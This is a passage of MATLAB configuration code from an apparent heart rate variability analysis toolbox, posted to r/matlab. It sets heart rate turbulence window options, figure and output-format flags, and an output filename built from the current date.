windows size in hours HRVparams.HRT.increment = 24; % Default 24h, sliding window increment in hours HRVparams.HRT.filterMethod = 'mean5before'; % Default mean5before, HRT filtering option %% 18. Output Settings HRVparams.gen_figs = 0; % Generate figures HRVparams.save_figs = 0; % Save generated figures if HRVparams.save_figs == 1 HRVparams.gen_figs = 1; end % Format settings for HRV Outputs HRVparams.output.format = 'csv'; % 'csv' - creates csv file for output % 'mat' - creates .mat file for output HRVparams.output.separate = 0; % Default : 1 = separate files for each subject % 0 = all results in one file HRVparams.output.num_win = []; % Specify number of lowest hr windows returned % leave blank if all windows should be returned % Format settings for annotations generated HRVparams.output.ann_format = 'binary'; % 'binary' = binary annotation file generated % 'csv' = ASCII CSV file generated %% 19. 
Filename to Save Data HRVparams.time = datestr(now, 'yyyymmdd'); % Setup time for filename of output HRVparams.filename = [HRVparams.time '_' project_name]; %% Export Parameter as Latex Table % Note that if you change the order of the parameters or add parameters % this might not work ExportHRVparams(HRVparams); end 
submitted by MisuzBrisby to matlab [link] [comments]
